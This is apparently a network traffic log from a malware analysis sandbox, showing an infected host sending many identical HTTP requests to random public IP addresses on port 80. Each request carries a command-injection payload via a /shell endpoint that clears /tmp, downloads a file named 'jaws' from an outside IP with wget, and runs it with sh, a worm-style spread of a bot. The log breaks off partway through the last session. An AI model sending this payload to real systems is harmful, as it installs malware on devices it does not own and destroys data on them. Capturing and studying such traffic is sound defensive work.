                            Session IDSource IPSource PortDestination IPDestination Port
                            453192.168.2.1357996181.74.252.24580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.156694889 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            454192.168.2.135584613.225.119.1680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.157293081 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            455192.168.2.1360478147.71.128.2680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.157917976 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            456192.168.2.1350270109.89.84.8780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.158561945 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            457192.168.2.1341816150.177.195.12680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.159317970 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            458192.168.2.1346328221.87.106.13280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.159853935 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            459192.168.2.1359562134.74.126.5480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.160403013 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            460192.168.2.1360032197.140.85.19080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.161005974 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            461192.168.2.1350788110.144.244.19380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.161714077 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            462192.168.2.1347272185.193.19.11880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.162192106 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            463192.168.2.133575081.247.181.18080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.162772894 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            464192.168.2.134639487.161.152.18080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.163353920 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            465192.168.2.1350066113.161.7.17180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.164056063 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            466192.168.2.133574499.110.30.5480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.164719105 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            467192.168.2.1353942172.189.3.9380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.165235996 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            468192.168.2.1350600201.158.211.23480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.165801048 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            469192.168.2.135438214.141.30.15580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.166378975 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            470192.168.2.1350818152.8.91.4980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.167023897 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            471192.168.2.1339078131.34.203.8780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.167637110 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            472192.168.2.1349010181.110.113.16380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.168602943 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            473192.168.2.1353182175.46.116.19180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.170154095 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            474192.168.2.135720018.100.79.9380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.170905113 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            475192.168.2.13594089.60.185.13380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.171504974 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            476192.168.2.135318464.124.149.680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.172142029 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            477192.168.2.1350846216.4.227.23480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.172736883 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            478192.168.2.134578096.169.78.2580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.173368931 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            479192.168.2.1348168120.230.204.1580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.173963070 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            480192.168.2.1354940195.117.82.21280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.174640894 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            481192.168.2.1334330141.155.135.15580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.175216913 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            482192.168.2.133433069.194.229.2880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.175937891 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            483192.168.2.13490962.73.98.080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.176604033 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            484192.168.2.1346608201.247.10.18880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.177223921 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            485192.168.2.1354386186.93.20.10680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.177787066 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            486192.168.2.1340916144.53.68.13480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.178384066 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            487192.168.2.1352472161.147.158.23880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.178977966 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            488192.168.2.133952889.154.140.23780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.179579973 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            489192.168.2.133603462.202.106.19880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.180176020 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            490192.168.2.133451670.179.238.10880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.180785894 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            491192.168.2.1335638105.54.97.5180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.181411028 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            492192.168.2.133973662.45.198.22380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.181988001 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            493192.168.2.134962687.245.32.15180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.182600975 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            494192.168.2.1354180157.18.104.20680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.184257030 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            495192.168.2.1334914208.149.111.3380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.185065031 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            496192.168.2.133883851.241.250.18480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.185647964 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            497192.168.2.1352934189.184.117.11280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.186209917 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            498192.168.2.1358402148.107.14.8280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.186822891 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            499192.168.2.134975841.85.227.15380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.187427998 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            500192.168.2.133581293.194.35.16880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.188000917 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            501192.168.2.1338476134.254.164.25180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.188584089 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            502192.168.2.1354590181.43.113.580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.189188957 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            503192.168.2.1351664175.66.140.25180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.189766884 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            504192.168.2.1354796163.171.166.3280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.190464020 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            505192.168.2.133479492.104.254.4980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.191076040 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            506192.168.2.1355284101.205.228.14280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.191669941 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            507192.168.2.136007464.49.25.8280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.192228079 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            508192.168.2.1347476217.58.14.17380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.192815065 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            509192.168.2.1337466213.143.126.6980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.193407059 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            510192.168.2.134001252.106.240.21680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.193979025 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            511192.168.2.1341838164.199.106.880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.194607973 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            512192.168.2.133862024.223.164.5980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.195195913 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            513192.168.2.134554266.229.246.16880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.195817947 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            514192.168.2.135808860.159.195.22280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.196419001 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            515192.168.2.135522876.250.8.22880
                            TimestampBytes transferredDirectionData
